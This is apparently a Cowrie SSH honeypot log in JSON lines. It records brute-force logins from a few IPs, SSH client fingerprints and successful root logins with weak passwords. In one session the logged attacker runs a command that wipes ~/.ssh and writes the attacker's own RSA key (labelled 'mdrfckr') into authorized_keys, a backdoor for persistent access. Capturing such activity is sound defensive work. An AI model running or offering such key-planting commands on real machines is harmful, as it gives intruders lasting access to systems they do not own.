{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:31:31.812682Z","src_ip":"212.227.235.229","session":"64a6329cc9f9"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:33.090376Z","src_ip":"212.227.235.229","session":"64a6329cc9f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37998,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3683260e4d2","protocol":"ssh","message":"New connection: 212.227.235.229:37998 (1.2.3.4:22) [session: f3683260e4d2]","sensor":"my-vps","timestamp":"2025-08-31T05:31:33.362176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:31:33.363176Z","src_ip":"212.227.235.229","session":"f3683260e4d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:31:33.635627Z","src_ip":"212.227.235.229","session":"f3683260e4d2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:31:34.767788Z","src_ip":"212.227.235.229","session":"f3683260e4d2"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:35.040978Z","src_ip":"212.227.235.229","session":"942608ddfe48"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:35.042096Z","src_ip":"212.227.235.229","session":"f3683260e4d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42658,"dst_ip":"1.2.3.4","dst_port":22,"session":"af82bdf43870","protocol":"ssh","message":"New connection: 212.227.235.229:42658 (1.2.3.4:22) [session: af82bdf43870]","sensor":"my-vps","timestamp":"2025-08-31T05:31:36.849281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T05:31:36.850515Z","src_ip":"212.227.235.229","session":"af82bdf43870"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T05:31:36.975049Z","src_ip":"212.227.235.229","session":"af82bdf43870"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T05:31:37.564189Z","src_ip":"212.227.235.229","session":"af82bdf43870"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:38.716236Z","src_ip":"212.227.235.229","session":"af82bdf43870"}
{"eventid":"cowrie.session.closed","duration":"24.8","message":"Connection lost after 24.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:40.892571Z","src_ip":"212.227.125.160","session":"10e9176844c0"}
{"eventid":"cowrie.session.closed","duration":30.67147135734558,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:47.742404Z","src_ip":"212.227.235.229","session":"22f0901fe7dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35902,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccc69d0eb4f6","protocol":"ssh","message":"New connection: 212.227.235.229:35902 (1.2.3.4:22) [session: ccc69d0eb4f6]","sensor":"my-vps","timestamp":"2025-08-31T05:31:58.067268Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57832,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a1398db744c","protocol":"ssh","message":"New connection: 212.227.235.229:57832 (1.2.3.4:22) [session: 5a1398db744c]","sensor":"my-vps","timestamp":"2025-08-31T05:31:58.492638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:31:58.493553Z","src_ip":"212.227.235.229","session":"5a1398db744c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:31:58.575584Z","src_ip":"212.227.235.229","session":"5a1398db744c"}
{"eventid":"cowrie.login.success","username":"root","password":"123!@#QWE","message":"login attempt [root/123!@#QWE] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:31:58.948031Z","src_ip":"212.227.235.229","session":"5a1398db744c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:31:59.132759Z","src_ip":"212.227.235.229","session":"5a1398db744c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:31:59.133475Z","src_ip":"212.227.235.229","session":"5a1398db744c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:31:59.134408Z","src_ip":"212.227.235.229","session":"5a1398db744c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:59.218685Z","src_ip":"212.227.235.229","session":"5a1398db744c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:31:59.318038Z","src_ip":"212.227.235.229","session":"ccc69d0eb4f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:31:59.831601Z","src_ip":"212.227.235.229","session":"5a1398db744c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:31:59.832269Z","src_ip":"212.227.235.229","session":"5a1398db744c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:31:59.834646Z","src_ip":"212.227.235.229","session":"ccc69d0eb4f6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:31:59.916726Z","src_ip":"212.227.235.229","session":"5a1398db744c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:31:59.917571Z","src_ip":"212.227.235.229","session":"5a1398db744c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57846,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1561707eb9a","protocol":"ssh","message":"New connection: 212.227.235.229:57846 (1.2.3.4:22) [session: b1561707eb9a]","sensor":"my-vps","timestamp":"2025-08-31T05:31:59.997516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:31:59.998802Z","src_ip":"212.227.235.229","session":"b1561707eb9a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:32:00.080481Z","src_ip":"212.227.235.229","session":"b1561707eb9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43780,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebeb1bfd17e5","protocol":"ssh","message":"New connection: 212.227.125.160:43780 (1.2.3.4:22) [session: ebeb1bfd17e5]","sensor":"my-vps","timestamp":"2025-08-31T05:32:00.317472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-31T05:32:00.318113Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:32:00.447313Z","src_ip":"212.227.235.229","session":"b1561707eb9a"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-08-31T05:32:00.578047Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34218,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf9bd62ca67a","protocol":"ssh","message":"New connection: 212.227.235.229:34218 (1.2.3.4:22) [session: cf9bd62ca67a]","sensor":"my-vps","timestamp":"2025-08-31T05:32:00.642014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:32:01.349433Z","src_ip":"212.227.235.229","session":"cf9bd62ca67a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:32:01.350169Z","src_ip":"212.227.235.229","session":"cf9bd62ca67a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:01.530955Z","src_ip":"212.227.235.229","session":"b1561707eb9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57850,"dst_ip":"1.2.3.4","dst_port":22,"session":"e689ed2a23b6","protocol":"ssh","message":"New connection: 212.227.235.229:57850 (1.2.3.4:22) [session: e689ed2a23b6]","sensor":"my-vps","timestamp":"2025-08-31T05:32:01.615818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:32:01.616934Z","src_ip":"212.227.235.229","session":"e689ed2a23b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:32:01.698830Z","src_ip":"212.227.235.229","session":"e689ed2a23b6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:32:02.027915Z","src_ip":"212.227.235.229","session":"e689ed2a23b6"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":59376,"dst_ip":"1.2.3.4","dst_port":22,"session":"189c604e6f01","protocol":"ssh","message":"New connection: 43.159.36.188:59376 (1.2.3.4:22) [session: 189c604e6f01]","sensor":"my-vps","timestamp":"2025-08-31T05:32:02.106354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:32:02.107425Z","src_ip":"43.159.36.188","session":"189c604e6f01"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:02.110995Z","src_ip":"212.227.235.229","session":"5a1398db744c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:02.111872Z","src_ip":"212.227.235.229","session":"e689ed2a23b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH 